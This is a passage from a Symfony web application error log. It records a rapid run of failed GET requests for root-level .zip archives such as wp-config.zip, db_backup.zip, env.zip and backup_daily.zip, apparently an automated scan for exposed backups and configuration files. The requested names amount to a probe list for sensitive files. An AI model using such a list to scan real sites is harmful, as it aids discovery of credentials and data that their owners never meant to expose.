  3532. [2025-12-18 07:39:48] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /xml.zip"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /xml.zip\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  3533. [2025-12-18 07:39:48] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /oracle.zip"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /oracle.zip\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  3534. [2025-12-18 07:39:49] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /audio.zip"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /audio.zip\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  3535. [2025-12-18 07:39:49] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /rpc.zip"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /rpc.zip\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  3536. [2025-12-18 07:39:51] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /wordpress-20240527.zip"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /wordpress-20240527.zip\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  3537. [2025-12-18 07:39:51] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /snapshot.zip"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /snapshot.zip\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  3538. [2025-12-18 07:39:51] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /web.zip"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /web.zip\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  3539. [2025-12-18 07:39:51] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /index.zip"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /index.zip\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  3540. [2025-12-18 07:39:51] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /wp.zip"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /wp.zip\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  3541. [2025-12-18 07:39:51] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /webapps.zip"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /webapps.zip\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  3542. [2025-12-18 07:39:51] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /sqlite.zip"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /sqlite.zip\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  3543. [2025-12-18 07:39:51] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /backup_monthly.zip"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /backup_monthly.zip\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  3544. [2025-12-18 07:39:51] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /service.zip"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /service.zip\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  3545. [2025-12-18 07:39:51] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /soap.zip"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /soap.zip\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  3546. [2025-12-18 07:39:51] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /copy.zip"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /copy.zip\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  3547. [2025-12-18 07:39:51] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /uploads.zip"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /uploads.zip\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  3548. [2025-12-18 07:39:51] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /subdomain.zip"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /subdomain.zip\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  3549. [2025-12-18 07:39:51] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /mssql.zip"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /mssql.zip\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  3550. [2025-12-18 07:39:51] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /sqlserver.zip"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /sqlserver.zip\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  3551. [2025-12-18 07:39:51] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /sql.zip"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /sql.zip\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  3552. [2025-12-18 07:39:51] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /backup_2.zip"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /backup_2.zip\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  3553. [2025-12-18 07:39:51] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /webservice.zip"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /webservice.zip\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  3554. [2025-12-18 07:39:51] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /microservice.zip"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /microservice.zip\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  3555. [2025-12-18 07:39:51] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /root.zip"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /root.zip\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  3556. [2025-12-18 07:39:51] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /websites.zip"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /websites.zip\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  3557. [2025-12-18 07:39:51] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /dotenv.zip"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /dotenv.zip\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  3558. [2025-12-18 07:39:51] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /htdocs.zip"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /htdocs.zip\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  3559. [2025-12-18 07:39:51] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /wordpress-admin.zip"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /wordpress-admin.zip\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  3560. [2025-12-18 07:39:51] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /cassandra.zip"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /cassandra.zip\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  3561. [2025-12-18 07:39:51] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /env.zip"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /env.zip\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  3562. [2025-12-18 07:39:54] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /mysql.zip"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /mysql.zip\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  3563. [2025-12-18 07:39:54] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /resources.zip"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /resources.zip\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  3564. [2025-12-18 07:39:54] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /db_backup.zip"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /db_backup.zip\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  3565. [2025-12-18 07:39:54] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /tmp.zip"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /tmp.zip\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  3566. [2025-12-18 07:39:54] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /db.zip"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /db.zip\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  3567. [2025-12-18 07:39:54] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /graphql.zip"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /graphql.zip\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  3568. [2025-12-18 07:39:54] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /backup_4.zip"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /backup_4.zip\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  3569. [2025-12-18 07:39:54] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /files.zip"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /files.zip\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  3570. [2025-12-18 07:39:54] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /wp-config.zip"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /wp-config.zip\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  3571. [2025-12-18 07:39:54] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /wp-site.zip"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /wp-site.zip\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  3572. [2025-12-18 07:39:54] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /backup_daily.zip"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /backup_daily.zip\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  3573. [2025-12-18 07:39:54] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /backup_3.zip"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /backup_3.zip\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  3574. [2025-12-18 07:39:54] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /wwwroot.zip"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /wwwroot.zip\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
